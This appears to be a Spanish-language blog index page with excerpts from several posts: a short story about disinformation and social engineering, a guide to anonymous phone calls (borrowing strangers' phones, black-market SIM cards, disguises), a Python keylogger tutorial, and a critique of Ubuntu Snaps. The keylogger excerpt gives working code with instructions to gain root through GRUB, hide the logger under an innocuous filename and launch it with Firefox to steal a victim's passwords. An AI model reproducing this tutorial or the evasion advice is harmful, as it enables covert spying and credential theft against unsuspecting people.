La batalla de Usonansk

Este relato está basado en hechos reales. Los datos identificativos han sido distorsionados.

«Según las fuentes que tenemos, planean centrar sus fuerzas en esta región». Poco sabían los generales de que sus fuentes habían sido intencionadamente envenenadas con información falsa. Sucedió algo bien diferente.

Resulta que ciertos militares y personas con altos cargos investigaban sobre la región que iría ser atacada, dejando un rastro digital que permitía al enemigo confirmar que se habían tragado su información falsa. Habían encontrado puntos débiles en la cadena de mando y no dejarían de explotarlos. Algunas de estas personas eran testarudas y tenían una larga trayectoria profesional, por lo que no tenían ningún interés en dejar sus altos cargos, a pesar de sus sucesivos errores. Así pues, sufrieron ataques de ingeniería social.

El círculo social de personas clave fue altamente monitorizado para obtener todo tipo de información, identificar puntos débiles, etc. El peligro de una confrontación directa y el miedo a escalar el conflicto fueron algunas de las debilidades identificadas en el enemigo.

El día 14 de agosto recibieron un ataque sorpresa que recorrió el mundo. Su precipitada respuesta fue comentada, muy minuciosamente en despachos importantes. Estaban perdiendo credibilidad y poder a pasos agigantados. Nadie creía en la victoria. Sacaban su dinero de acciones y bancos, de esos lugares que creían tan seguros.

Estaban gravemente infectados por parásitos que vivían a su costa y se iban de la lengua, libraban luchas internas... El enorme gigante tenía pies de barro.

Cómo hacer llamadas de teléfono anónimas

Método 1: tomar prestado un móvil

Una forma sencilla de realizar una llamada anónima es tomar prestado un móvil a una persona de la calle. Si pides el favor de forma amable, le convences de que no llevas el móvil encima y de que es una emergencia, lo más probable es que no tengas problema. Si tienes problema, otra opción es ofrecer algo a cambio por el favor.

Debes saber que el sistema telefónico no proporciona privacidad. Por Internet puedes realizar llamadas cifradas y a través de redes privadas virtuales o Tor para una mayor privacidad.

Las llamadas pueden ser grabadas por las operadoras de telefonía y agencias de inteligencia, así que si necesitas un nivel alto de privacidad, puedes distorsionar la voz. Si temes que la persona que te ha dejado el teléfono le revele a alguien información relacionada con tu identidad (rasgos faciales, estatura, etc.), puedes protegerte cambiando tu apariencia, vestimenta habitual y estatura para la operación (usando lentillas de colores, zapatos de plataforma o tacones, afeitándote o dejándote barba, cambiando el peinado, etc.). En casos en los que necesites más privacidad aún, puedes encargarle a otra persona que realice la llamada en tu lugar.

Método 2: conseguir una tarjeta SIM de forma anónima

En muchos países es necesario proporcionar tu información personal para comprar una tarjeta SIM. Es posible evitar esta restricción comprándola en el mercado negro. Otro forma es convenciendo a una persona que no te conozca para que te compre una tarjeta a cambio de dinero.

Introduciendo la tarjeta en un móvil de teclas o que tenga un sistema operativo seguro, podrás hacer llamadas que no estén asociadas a tu identidad real. De nuevo, si necesitas una máxima privacidad, ten extrema precaución: no olvides distorsionar la voz, realizar la llamada desde un lugar que no suelas frecuentar, borrar la llamada del historial, etc. Continúa leyendo Cómo hacer llamadas de teléfono anónimas

Registrador de teclas (keylogger) en Python para GNU/Linux. Enviar información por correo y autodestruirse

En este artículo enseño como programar un keylogger avanzado que envía mensajes por correo electrónico y se autodestruye después de una fecha concreta.

Continúa leyendo Registrador de teclas (keylogger) en Python para GNU/Linux. Enviar información por correo y autodestruirse

Registrador de teclas (keylogger) básico para GNU/Linux. Robar contraseñas e información tecleada

Una forma sencilla de robar contraseñas es instalar un registrador de teclas (keylogger) en el ordenador de la víctima. Voy a mostrar cómo hacerlo en GNU/Linux usando el lenguaje de programación Python.

Lo primero que debemos hacer es obtener permisos de superusuario. Si el equipo lo administramos nosotros, ya sabemos la contraseña. En caso contrario, podemos obtener acceso como superusuario desde GRUB. Con los permisos necesarios tenemos vía libre para instalar el keylogger.

En primer lugar, hay que instalar el módulo pynput mediante...

sudo pip install pynput

A continuación, debemos escribir el keylogger. Este es el código que usaremos:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

El registro de teclas se guarda en log_dir. Yo, en este caso, he especificado la carpeta de documentación de Python 3 en GNU/Linux. El keylogger también podemos guardarlo en ese mismo directorio, quizá con el nombre compile_docs.py o algo parecido para no llamar la atención. Lo ideal es elegir una carpeta a la que la victima no vaya a entrar para evitar que se dé cuenta de lo que estamos haciendo.

El último paso sería ejecutar el programa cada vez que se encienda el ordenador o se inicie un programa sin que la víctima se dé cuenta. Si, por ejemplo, queremos iniciar el keylogger cada vez que el usuario abra Firefox, podemos modificar el comando Firefox. Continúa leyendo Registrador de teclas (keylogger) básico para GNU/Linux. Robar contraseñas e información tecleada

Snaps en Ubuntu: menos seguridad y actualizaciones automáticas

Con su nueva versión 22.04, que será publicada el 21 de abril, Ubuntu hará que más programas usen paquetes Snap en vez de los .deb. Estos paquetes se actualizan de forma automática sin pasar por una fase de prueba como sucede con los paquetes de Debian y otras distribuciones. En el caso del paquete de Firefox, es el equipo de Mozilla (no Ubuntu) quien decide cómo y cuándo se actualiza el navegador.

Firefox es software libre, pero incluye componentes privativos como Pocket. Mozilla puede mediante Snap añadir otros componentes parecidos y funcionalidades desagradables.

Los Snaps tienen algunas ventajas: permiten empaquetar un programa con todas sus dependencias, funcionan en cualquier distribución, etc. Sin embargo, ralentizan el proceso de arranque, son mucho más lentos cuando se ejecutan por primera vez, ocupan más espacio (pues contienen en ellos bibliotecas que podrían usarse por varios programas), su repositorio predeterminado («tienda») es privativo, requiere el uso de systemd, etc.

Si el uso de los Snaps fuera opcional en Ubuntu, no habría tanta controversia, pero Ubuntu los ha impuesto para varios paquetes, para los que ya no existe una alternativa .deb.